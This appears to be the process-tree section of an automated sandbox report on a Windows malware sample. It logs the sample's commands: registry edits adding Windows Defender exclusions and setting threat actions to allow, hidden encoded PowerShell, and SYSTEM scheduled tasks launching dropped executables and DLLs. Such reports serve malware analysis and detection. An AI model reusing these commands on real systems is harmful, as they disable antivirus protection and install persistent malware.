                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5536
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:5124
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:824
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:5468
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5612
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4832
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1152
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4356
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1504
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2996
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5892
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1516
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:6100
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4828
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5360
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3876
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4500
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5584
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2084
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5860
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4020
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3308
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1184
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "gldwpvaOL" /SC once /ST 06:27:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:5000
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /run /I /tn "gldwpvaOL"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1708
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /DELETE /F /TN "gldwpvaOL"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:6068
                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3308
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 02:21:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\vSlQuHJ.exe\" GH /kbRpdidfh 385118 /S" /V1 /F
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:6036
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /run /I /tn "XyyyteIMwZeutaZuw"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:680
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                          PID:5384
                                                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4408
                                                                                                                                                                                                                          • C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\vSlQuHJ.exe
                                                                                                                                                                                                                            C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\vSlQuHJ.exe GH /kbRpdidfh 385118 /S
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:6104
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:1868
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1096
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:4672
                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:1596
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4956
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:660
                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:5116
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:4152
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:4304
                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:5136
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:5428
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:3064
                                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:5808
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:736
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:5308
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:5192
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:5868
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:1184
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:4124
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:2432
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:6124
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            PID:1188
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                PID:5908
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\hAVyWa.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                        PID:5520
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\hrmYvNH.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                        PID:1412
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /END /TN "FPieTEPPuEmJrhC"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:4312
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:332
                                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:5772
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\IMdzeQL.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                              PID:3140
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4124
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\vRuuRPP.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                PID:4216
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\pToytPu.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                PID:5524
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\mOwUvwK.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                PID:1116
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 05:59:29 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\uavPNqcj\UYkvzfH.dll\",#1 /jkididi 385118" /V1 /F
